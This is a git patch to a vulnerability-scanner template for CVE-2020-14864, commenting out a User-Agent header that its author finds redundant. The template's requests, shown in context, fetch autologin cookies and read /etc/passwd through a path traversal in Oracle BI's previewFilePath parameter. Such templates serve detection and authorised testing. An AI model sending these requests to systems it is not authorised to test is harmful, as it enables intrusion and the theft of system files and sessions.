From f668c022fe8e13baeec5fef9edf28b1593dce277 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Thu, 11 Mar 2021 17:30:25 +0200 Subject: [PATCH] Passing User-Agent seems redudant --- cves/2020/CVE-2020-14864.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/cves/2020/CVE-2020-14864.yaml b/cves/2020/CVE-2020-14864.yaml index 62b8bae350..ca1cc0489f 100644 --- a/cves/2020/CVE-2020-14864.yaml +++ b/cves/2020/CVE-2020-14864.yaml @@ -12,8 +12,9 @@ info: requests: - method: GET - headers: - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 + # Why is the header needed here? it doesn't appear to be required by the exploit + # headers: + # User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 path: - '{{BaseURL}}/analytics/saw.dll?bieehome&startPage=1' # grab autologin cookies - '{{BaseURL}}/analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd'